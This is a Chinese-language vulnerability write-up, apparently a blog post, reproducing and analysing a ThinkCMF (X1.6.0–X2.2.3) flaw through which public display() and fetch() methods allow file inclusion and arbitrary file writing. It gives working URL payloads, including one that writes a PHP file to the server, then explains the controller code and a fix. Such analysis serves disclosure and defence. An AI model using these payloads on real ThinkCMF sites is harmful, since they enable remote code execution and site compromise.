zoukankan      html  css  js  c++  java
  • ThinkCMF框架任意内容包含漏洞分析复现

    0x00 CMS简介

    ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。
    ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。
    每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。

    0x01 漏洞简介

    • 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。

    • 影响范围:

      ThinkCMF X1.6.0
      ThinkCMF X2.1.0
      ThinkCMF X2.2.0
      ThinkCMF X2.2.1
      ThinkCMF X2.2.2
      ThinkCMF X2.2.3

    0x02 环境搭建

    直接phpstudy一把梭
    在这里插入图片描述

    0x03 漏洞利用

    1.通过构造a参数的display()方法,实现任意内容包含漏洞
    payload:

    ?a=display&templateFile=README.md
    

    在这里插入图片描述

    2.通过构造a参数的fetch()方法,实现任意文件写入
    payload:

    ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
    

    在这里插入图片描述
    回车执行
    可以看到根目录下新建的test.php
    在这里插入图片描述
    打开test.php
    成功写入一句话
    在这里插入图片描述

    0x04 代码分析

    首先看下入口文件
    在这里插入图片描述

    根据poc盲猜控制器IndexController.class.php

    可以知道继承了HomebaseController,通过gma参数指定分组模块方法,这里可以通过a参数直接调用PortalIndexController父类(HomebaseController)中的一些权限为public的方法。
    在这里插入图片描述
    可以看的的public方法里就有display()fetch(),还有方法作用及参数含义。
    display函数的作用是加载模板和页面输出,所对应的参数为:templateFile为模板文件地址,charset模板字符集,contentType输出类型,content输出内容。
    在这里插入图片描述
    templateFile参数会经过parseTemplate()方法处理。
    applicationCommonControllerAdminbaseController.class.phpparseTemplate()方法如下
    在这里插入图片描述
    parseTemplate()方法作用:判断模板主题是否存在,当模板主题不存在时会在当前目录下开始查找,形成文件包含。
    在这里插入图片描述
    fetch函数的作用是获取输出页面内容,调用内置模板引擎。
    先判断content是否为空,不为空则templateFile参数会经过parseTemplate()方法处理

    thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。
    

    所以当templateFileprefix参数为空,在content参数传入php代码,便可以形成模板注入。

    0x05 漏洞修复

    HomebaseController.class.phpAdminbaseController.class.php类中displayfetch函数的修饰符改为protected

    0x06 参考文章

    https://xz.aliyun.com/t/6626#toc-5

  • 相关阅读:
    js 动态 activex 组件
    nodejs 任务调度使用
    javascript 停止事件冒泡以及阻止默认事件冒泡
    使用SQL字符串反转函数REVERSE巧妙实现lastindexof功能
    morris.js 简单学习
    weblogic启动受管服务器报错Authentication for user weblogic denied (weblogic 11g 域账号密码不生效的解决方法)
    正向代理与反向代理【总结】
    不休息的工作都是浪费时间
    Oracle实例名,服务名等概念区别与联系
    Tomcat启动找不到JRE_HOME的解决方法
  • 原文地址:https://www.cnblogs.com/0nc3/p/12071275.html
Copyright © 2011-2022 走看看